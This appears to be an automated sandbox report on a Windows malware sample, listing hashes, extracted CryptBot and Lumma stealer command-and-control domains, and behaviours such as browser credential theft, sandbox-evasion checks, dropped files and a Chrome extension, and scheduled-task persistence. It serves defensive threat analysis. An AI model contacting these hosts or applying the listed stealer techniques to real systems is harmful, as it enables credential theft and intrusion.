Analysis
-
max time kernel
297s -
max time network
301s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
09-09-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
Resource
win10-20240404-en
General
-
Target
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe
-
Size
13.2MB
-
MD5
56c671ca2f1c447d9626235f396c870a
-
SHA1
3bc86393d8b3f0e20e8b49466c48c0a54a03fd61
-
SHA256
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a
-
SHA512
44e253da47ec0aa276cbe2abdf4186e9634eb81176a8a9263b48eda3f44346179a380c4b76c157c14740dcb3675dd91ffbf16a7f60accdaedaa58b74a2d313e6
-
SSDEEP
393216:e0qJtXxO7qhaKNDJCvTV7D3OwjdAjLnDUFXoQcnU:e/t2KNJC137dAjEFSU
Malware Config
Extracted
cryptbot
analforeverlovyu.top
thirtv13sb.top
-
url_path
/v1/upload.php
Extracted
lumma
https://preachstrwnwjw.shop/api
https://complainnykso.shop/api
https://basedsymsotp.shop/api
https://charistmatwio.shop/api
https://grassemenwji.shop/api
https://ignoracndwko.shop/api
https://stitchmiscpaew.shop/api
https://commisionipwn.shop/api
https://tenntysjuxmz.shop/api
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 86 3984 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1216 powershell.exe 1480 powershell.exe 3212 powershell.EXE 3488 powershell.exe 1336 powershell.exe 2480 powershell.exe 3116 powershell.exe 3064 powershell.exe 2912 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
DhIGibW.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Control Panel\International\Geo\Nation DhIGibW.exe -
Executes dropped EXE 13 IoCs
Processes:
build_4.exebuild_4.exeFile1.exeWindows.exeservice123.exe385104.exeInstall.exeInstall.exeservice123.exeInstall.exeservice123.exeDhIGibW.exeservice123.exepid process 4212 build_4.exe 4440 build_4.exe 2136 File1.exe 4564 Windows.exe 4980 service123.exe 2768 385104.exe 304 Install.exe 1412 Install.exe 2988 service123.exe 2152 Install.exe 1260 service123.exe 4900 DhIGibW.exe 2460 service123.exe -
Indirect Command Execution 1 TTPs 17 IoCs
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
Processes:
forfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exeforfiles.exepid process 2144 forfiles.exe 1060 forfiles.exe 3888 forfiles.exe 1788 forfiles.exe 2060 forfiles.exe 2756 forfiles.exe 1616 forfiles.exe 4756 forfiles.exe 3276 forfiles.exe 4872 forfiles.exe 2512 forfiles.exe 4884 forfiles.exe 4044 forfiles.exe 4756 forfiles.exe 1636 forfiles.exe 3364 forfiles.exe 3644 forfiles.exe -
Loads dropped DLL 23 IoCs
Processes:
build_4.exeservice123.exeservice123.exeservice123.exerundll32.exeservice123.exepid process 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4440 build_4.exe 4980 service123.exe 2988 service123.exe 1260 service123.exe 3984 rundll32.exe 2460 service123.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
Processes:
DhIGibW.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json DhIGibW.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json DhIGibW.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Drops file in System32 directory 33 IoCs
Processes:
powershell.exeDhIGibW.exepowershell.exepowershell.exepowershell.exerundll32.exeInstall.exepowershell.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_5F8ABD199E1CF2EB9B30F8FD50D3DB0D DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_2F09F384AB04F931E2EF39FD04145E2F DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\54E176903A096E58E807B60E1BDFA85C DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 DhIGibW.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\54E176903A096E58E807B60E1BDFA85C DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_2E1554F9937BF8D3743D83D919742174 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 DhIGibW.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 DhIGibW.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
File1.exedescription pid process target process PID 2136 set thread context of 4216 2136 File1.exe RegAsm.exe -
Drops file in Program Files directory 14 IoCs
Processes:
DhIGibW.exedescription ioc process File created C:\Program Files (x86)\FDxSmxakU\tpuPfd.dll DhIGibW.exe File created C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\ZZJMobL.dll DhIGibW.exe File created C:\Program Files (x86)\TjUkTRKCSiJkC\EwNGXZF.xml DhIGibW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DhIGibW.exe File created C:\Program Files (x86)\tEZYwqVfuQYU2\ttspFuCPVfTdr.dll DhIGibW.exe File created C:\Program Files (x86)\tEZYwqVfuQYU2\lPMjDmV.xml DhIGibW.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi DhIGibW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja DhIGibW.exe File created C:\Program Files (x86)\FDxSmxakU\hRyNhQz.xml DhIGibW.exe File created C:\Program Files (x86)\HIJHyLDMFVIrArjMcDR\ESFWuTA.xml DhIGibW.exe File created C:\Program Files (x86)\TjUkTRKCSiJkC\lxCvlCt.dll DhIGibW.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DhIGibW.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak DhIGibW.exe File created C:\Program Files (x86)\QSBDBQxFkAUn\gBSknPq.dll DhIGibW.exe -
Drops file in Windows directory 4 IoCs
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\bOYLEOfZCACcRQIJvG.job schtasks.exe File created C:\Windows\Tasks\hzhNAJUNSjjdIpELG.job schtasks.exe File created C:\Windows\Tasks\FnGigHNXGPuYnow.job schtasks.exe File created C:\Windows\Tasks\gXgiPdpSGbihZCqEr.job schtasks.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\RarSFX0\build_4.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2060 2152 WerFault.exe Install.exe 4372 1412 WerFault.exe Install.exe 768 4900 WerFault.exe DhIGibW.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Install.exereg.exereg.execmd.exepowershell.execmd.exetaskkill.execmd.exepowershell.exepowershell.exereg.exereg.execmd.exerundll32.exeschtasks.exepowershell.exeforfiles.exeschtasks.execmd.exeforfiles.exereg.exereg.exeschtasks.execmd.exetaskkill.execmd.exeRegAsm.exeforfiles.exereg.exereg.exereg.execmd.exereg.execscript.execmd.execmd.execmd.execmd.exepowershell.exereg.exereg.exeforfiles.execmd.execmd.exeforfiles.exeschtasks.exereg.exereg.exereg.exeforfiles.exereg.execmd.exeWMIC.exereg.exereg.exeschtasks.execmd.execmd.execmd.exereg.exeschtasks.execmd.exetaskkill.exereg.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language forfiles.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Windows.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Windows.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Windows.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 4912 taskkill.exe 792 taskkill.exe 4464 taskkill.exe 1556 taskkill.exe 4128 taskkill.exe 4484 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
DhIGibW.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exerundll32.exedescription ioc process Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DhIGibW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{38fd360b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" DhIGibW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" DhIGibW.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings 806b687095169d4ee65405782ba8527ec7f2fcd6918e3da7fa4417377e0cad3a.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2292 schtasks.exe 2724 schtasks.exe 316 schtasks.exe 4920 schtasks.exe 2348 schtasks.exe 3476 schtasks.exe 860 schtasks.exe 5016 schtasks.exe 1976 schtasks.exe 2152 schtasks.exe 3504 schtasks.exe -
